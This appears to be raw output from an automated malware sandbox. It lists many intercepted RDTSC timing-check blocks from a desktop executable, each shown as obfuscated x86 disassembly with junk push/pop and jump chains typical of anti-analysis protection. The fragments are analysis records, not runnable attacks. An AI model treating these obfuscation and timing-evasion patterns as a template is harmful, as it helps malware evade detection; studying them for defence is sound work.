Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B008A second address: 49B0132 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 5D3AA6ADh 0x00000010 jmp 00007F60A4BE8BE0h 0x00000015 call 00007F60A4BE8BD9h 0x0000001a jmp 00007F60A4BE8BE0h 0x0000001f push eax 0x00000020 jmp 00007F60A4BE8BDBh 0x00000025 mov eax, dword ptr [esp+04h] 0x00000029 jmp 00007F60A4BE8BE9h 0x0000002e mov eax, dword ptr [eax] 0x00000030 pushad 0x00000031 pushad 0x00000032 mov dx, FC80h 0x00000036 jmp 00007F60A4BE8BE9h 0x0000003b popad 0x0000003c mov eax, 5FEB3747h 0x00000041 popad 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F60A4BE8BDFh 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0132 second address: 49B0138 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0138 second address: 49B016A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F60A4BE8BE7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B016A second address: 49B01FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f pushad 0x00000010 movzx eax, dx 0x00000013 movsx edx, si 0x00000016 popad 0x00000017 nop 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F60A4E98EFEh 0x0000001f sbb ch, 00000048h 0x00000022 jmp 00007F60A4E98EFBh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F60A4E98F08h 0x0000002e or esi, 423DC6A8h 0x00000034 jmp 00007F60A4E98EFBh 0x00000039 popfd 0x0000003a popad 0x0000003b push eax 0x0000003c pushad 0x0000003d popad 0x0000003e nop 0x0000003f jmp 00007F60A4E98EFCh 0x00000044 sub esp, 18h 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B01FA second address: 49B01FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B01FE second address: 49B0204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0204 second address: 49B02D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push esi 0x0000000c mov ecx, edx 0x0000000e pop ebx 0x0000000f pushfd 0x00000010 jmp 00007F60A4BE8BE6h 0x00000015 add cx, ADC8h 0x0000001a jmp 00007F60A4BE8BDBh 0x0000001f popfd 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F60A4BE8BDFh 0x00000029 sub esi, 77FCE40Eh 0x0000002f jmp 00007F60A4BE8BE9h 0x00000034 popfd 0x00000035 jmp 00007F60A4BE8BE0h 0x0000003a popad 0x0000003b xchg eax, ebx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F60A4BE8BDEh 0x00000043 sub ah, FFFFFFB8h 0x00000046 jmp 00007F60A4BE8BDBh 0x0000004b popfd 0x0000004c mov eax, 578481EFh 0x00000051 popad 0x00000052 xchg eax, esi 0x00000053 jmp 00007F60A4BE8BE2h 0x00000058 push eax 0x00000059 jmp 00007F60A4BE8BDBh 0x0000005e xchg eax, esi 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B02D9 second address: 49B02E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B02E0 second address: 49B02FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60A4BE8BE9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B02FD second address: 49B03EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F60A4E98F03h 0x00000013 jmp 00007F60A4E98F03h 0x00000018 popfd 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007F60A4E98F09h 0x00000020 xchg eax, edi 0x00000021 pushad 0x00000022 mov bh, al 0x00000024 mov dh, 92h 0x00000026 popad 0x00000027 mov eax, dword ptr [769B4538h] 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F60A4E98EFEh 0x00000033 adc si, 2BF8h 0x00000038 jmp 00007F60A4E98EFBh 0x0000003d popfd 0x0000003e mov ebx, ecx 0x00000040 popad 0x00000041 xor dword ptr [ebp-08h], eax 0x00000044 jmp 00007F60A4E98F02h 0x00000049 xor eax, ebp 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007F60A4E98F07h 0x00000052 and eax, 10598D1Eh 0x00000058 jmp 00007F60A4E98F09h 0x0000005d popfd 0x0000005e pushad 0x0000005f push eax 0x00000060 pop edi 0x00000061 push esi 0x00000062 pop edx 0x00000063 popad 0x00000064 popad 0x00000065 nop 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F60A4E98EFBh 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B03EE second address: 49B040E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F60A4BE8BDEh 0x00000010 nop 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B040E second address: 49B0412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0412 second address: 49B042F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B042F second address: 49B043F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60A4E98EFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B043F second address: 49B049B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-10h] 0x0000000b jmp 00007F60A4BE8BE7h 0x00000010 mov dword ptr fs:[00000000h], eax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F60A4BE8BE4h 0x0000001d and esi, 35409498h 0x00000023 jmp 00007F60A4BE8BDBh 0x00000028 popfd 0x00000029 mov edi, esi 0x0000002b popad 0x0000002c mov dword ptr [ebp-18h], esp 0x0000002f pushad 0x00000030 movzx ecx, di 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B049B second address: 49B052C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F60A4E98F06h 0x00000008 and esi, 029F5628h 0x0000000e jmp 00007F60A4E98EFBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov eax, dword ptr fs:[00000018h] 0x0000001d jmp 00007F60A4E98F06h 0x00000022 mov ecx, dword ptr [eax+00000FDCh] 0x00000028 jmp 00007F60A4E98F00h 0x0000002d test ecx, ecx 0x0000002f jmp 00007F60A4E98F00h 0x00000034 jns 00007F60A4E98F42h 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F60A4E98F07h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B052C second address: 49B0532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0532 second address: 49B0536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0536 second address: 49B057B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add eax, ecx 0x0000000d jmp 00007F60A4BE8BE6h 0x00000012 mov ecx, dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F60A4BE8BE7h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B057B second address: 49B0593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60A4E98F04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0179 second address: 49A01D9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F60A4BE8BE4h 0x00000008 sbb esi, 27D476C8h 0x0000000e jmp 00007F60A4BE8BDBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F60A4BE8BE8h 0x0000001c add ax, F928h 0x00000021 jmp 00007F60A4BE8BDBh 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c movsx edx, si 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A01D9 second address: 49A0216 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F60A4E98F09h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov esi, 3E79E083h 0x00000016 pushad 0x00000017 mov ebx, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0216 second address: 49A024C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 jmp 00007F60A4BE8BDEh 0x0000000d sub esp, 2Ch 0x00000010 pushad 0x00000011 mov cl, 08h 0x00000013 mov edi, 3A4CADDEh 0x00000018 popad 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F60A4BE8BE1h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A024C second address: 49A02BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 pushfd 0x00000006 jmp 00007F60A4E98F03h 0x0000000b or ch, FFFFFFEEh 0x0000000e jmp 00007F60A4E98F09h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov eax, ebx 0x0000001f pushfd 0x00000020 jmp 00007F60A4E98EFFh 0x00000025 add ch, FFFFFFFEh 0x00000028 jmp 00007F60A4E98F09h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A02BB second address: 49A02CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60A4BE8BDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A02CB second address: 49A02CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0327 second address: 49A032D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A032D second address: 49A0387 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007F60A4E98F01h 0x00000010 sub edi, edi 0x00000012 jmp 00007F60A4E98F07h 0x00000017 inc ebx 0x00000018 pushad 0x00000019 call 00007F60A4E98F04h 0x0000001e mov ax, B8C1h 0x00000022 pop ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 movsx edi, cx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0387 second address: 49A03D8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F60A4BE8BE6h 0x00000008 adc si, 2808h 0x0000000d jmp 00007F60A4BE8BDBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 test al, al 0x00000018 jmp 00007F60A4BE8BE6h 0x0000001d je 00007F60A4BE8DEAh 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A03D8 second address: 49A03DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A03DE second address: 49A0418 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c pushad 0x0000000d mov cx, B29Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F60A4BE8BE8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0418 second address: 49A041C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0450 second address: 49A0454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0454 second address: 49A0476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 mov di, ax 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F60A4E98F03h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A04C1 second address: 49A04DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 3061BB4Ah 0x00000008 jmp 00007F60A4BE8BDBh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test eax, eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A04DF second address: 49A04E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A04E5 second address: 49A04EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A04EB second address: 49A04EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A04EF second address: 49A0516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F6116BA6B6Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F60A4BE8BE7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0516 second address: 49A053F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F60A4E98FA3h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A053F second address: 49A0543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0543 second address: 49A0549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0549 second address: 49A054E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A054E second address: 49A05D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F60A4E98EFEh 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d cmp dword ptr [ebp-14h], edi 0x00000010 jmp 00007F60A4E98F01h 0x00000015 jne 00007F6116E56E19h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F60A4E98F03h 0x00000024 sbb si, F41Eh 0x00000029 jmp 00007F60A4E98F09h 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F60A4E98F00h 0x00000035 adc esi, 101C7A18h 0x0000003b jmp 00007F60A4E98EFBh 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A05D8 second address: 49A05DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A05DF second address: 49A05FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebx, dword ptr [ebp+08h] 0x0000000a jmp 00007F60A4E98EFCh 0x0000000f lea eax, dword ptr [ebp-2Ch] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A05FE second address: 49A0602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0602 second address: 49A0606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0606 second address: 49A060C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A060C second address: 49A065B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, di 0x00000010 pushfd 0x00000011 jmp 00007F60A4E98F09h 0x00000016 sbb ah, 00000076h 0x00000019 jmp 00007F60A4E98F01h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A065B second address: 49A066B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60A4BE8BDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A066B second address: 49A0690 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F60A4E98F08h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0690 second address: 49A0696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0696 second address: 49A069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A069C second address: 49A06A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A06A0 second address: 49A06AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A06AF second address: 49A06B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A06B5 second address: 49A06E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 32D93335h 0x00000008 mov edx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e pushad 0x0000000f mov ecx, 7A6881E9h 0x00000014 push ecx 0x00000015 movsx edi, ax 0x00000018 pop ecx 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F60A4E98F03h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990DBF second address: 4990DC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990DC5 second address: 4990DF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F60A4E98F04h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990DF5 second address: 4990DFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 02BA8DC4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990DFF second address: 4990EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 pushad 0x0000000a mov esi, ebx 0x0000000c mov cx, di 0x0000000f popad 0x00000010 jmp 00007F60A4E98EFDh 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F60A4E98EFCh 0x0000001f xor si, 69A8h 0x00000024 jmp 00007F60A4E98EFBh 0x00000029 popfd 0x0000002a pushad 0x0000002b mov ax, B5B5h 0x0000002f pushfd 0x00000030 jmp 00007F60A4E98F02h 0x00000035 xor ax, DC08h 0x0000003a jmp 00007F60A4E98EFBh 0x0000003f popfd 0x00000040 popad 0x00000041 popad 0x00000042 xchg eax, ecx 0x00000043 pushad 0x00000044 movzx ecx, di 0x00000047 pushfd 0x00000048 jmp 00007F60A4E98F01h 0x0000004d sub esi, 4DDCFF26h 0x00000053 jmp 00007F60A4E98F01h 0x00000058 popfd 0x00000059 popad 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F60A4E98EFCh 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990EA8 second address: 4990F1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F60A4BE8BE1h 0x00000009 sub ecx, 482C9F36h 0x0000000f jmp 00007F60A4BE8BE1h 0x00000014 popfd 0x00000015 mov bx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ecx 0x0000001c pushad 0x0000001d mov eax, 2B3B801Fh 0x00000022 pushfd 0x00000023 jmp 00007F60A4BE8BE4h 0x00000028 add ecx, 4F218588h 0x0000002e jmp 00007F60A4BE8BDBh 0x00000033 popfd 0x00000034 popad 0x00000035 mov dword ptr [ebp-04h], 55534552h 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f mov dx, 71F6h 0x00000043 mov si, di 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B07 second address: 49A0B23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B23 second address: 49A0B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B27 second address: 49A0B3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B3A second address: 49A0B40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B40 second address: 49A0B58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f movsx edx, si 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B58 second address: 49A0B65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov esi, 2B64A709h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B65 second address: 49A0B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
